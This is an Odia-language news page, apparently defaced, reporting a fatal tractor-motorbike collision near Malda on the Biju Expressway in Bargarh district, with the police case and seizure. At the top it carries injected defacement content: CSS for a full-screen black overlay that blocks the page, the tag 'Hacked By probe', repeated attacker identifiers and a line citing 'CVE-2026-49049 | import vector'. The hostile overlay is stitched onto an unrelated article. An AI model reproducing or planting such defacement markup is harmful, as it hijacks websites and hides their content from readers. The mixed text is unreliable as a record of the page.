html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPKQR04E4X
`58; Hacked By probe `68;
[ HXIMPkqr04e4x ]
HXIMPkqr04e4x
CVE-2026-49049 | import vector

ମର୍ମନ୍ତୁଦ ସଡକ ଦୁର୍ଘଟଣାରେ ଜଣେ ମୃତ

User Rating: 4 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Inactive
 

ବରଗଡ :- ଆଜି ଦୀପହରେ ବରଗଡ଼ ଜିଲ୍ଲା ପଦ୍ମପୁର ପାଇକମାଲ ବିଜୁ ଏକ୍ସପ୍ରେସ ୱେ ର ମଲଦା ଠାରେ ଏକ ମର୍ମନ୍ତୁଦ ସଡକ ଦୁର୍ଘଟଣା ଜଣେ ବ୍ୟକ୍ତି ର ମୃତ୍ୟୁ ହୋଇଯାଇଥିବା ଜଣା ପଡ଼ିଛି । ପ୍ରାପ୍ତ ସୂଚନା ଅନୁସାରେ ନୂଆପଡା ଜିଲ୍ଲା ଖରିଆର ରୋଡ଼ ର ଅବିଦ ହୁସେନ ନାମକ ଜଣେ ବ୍ୟକ୍ତି ଏକ ବଜାଜ ପଲସର ବାଇକରେ ସୋହେଲା ରୁ ଖରିଆର ରୋଡ଼ ଫେରୁଥିବା ବେଳେ ମଲଦା ଗ୍ରାମର ପୋଖରୀ ନିକଟରେ ସାମ୍ନା ପଟୁ ଏକ ଟ୍ରାକ୍ଟର ଆସି ଅବିଦ କୁ ଧକ୍କା ମାରିଥିଲା । ଆହତ ଅବିଦକୁ  ଆମ୍ବୁଲାନ୍ସ ଯୋଗେ ପଦ୍ମପୁର ଉପଖଣ୍ଡ ଡାକ୍ତରଖାନାକୁ ପଠେଇ ଦିଆଯାଇଥିଲା । ହେଲେ ଡାକ୍ତରଖାନାରେ ଡାକ୍ତର ଅବିଦକୁ ମୃତ ଘୋଷଣା କରିଥିଲେ । ଘଟଣାର ଖବର ପାଇବା ପରେ ପାଇକମାଲ ଥାନା ର ସବଇନ୍ସପେକ୍ଟର ଶ୍ରୀ ବିପିନ ବାଗ ପାଇକମାଲ ଥାନାରେ କେଶ ନମ୍ବର ୯୧/୨୧ ରୁଜୁ କରି ଶବ ବ୍ୟବଚ୍ଛେଦ କରାଇ ଶବକୁ ପରିବାର ଲୋକଙ୍କୁ ହସ୍ତାନ୍ତର କରିବା ସହିତ ଟ୍ରାକ୍ଟର କୁ ଜବତ କରିଥିବା ଜଣା ପଡ଼ିଛି ।

0
0
0
s2sdefault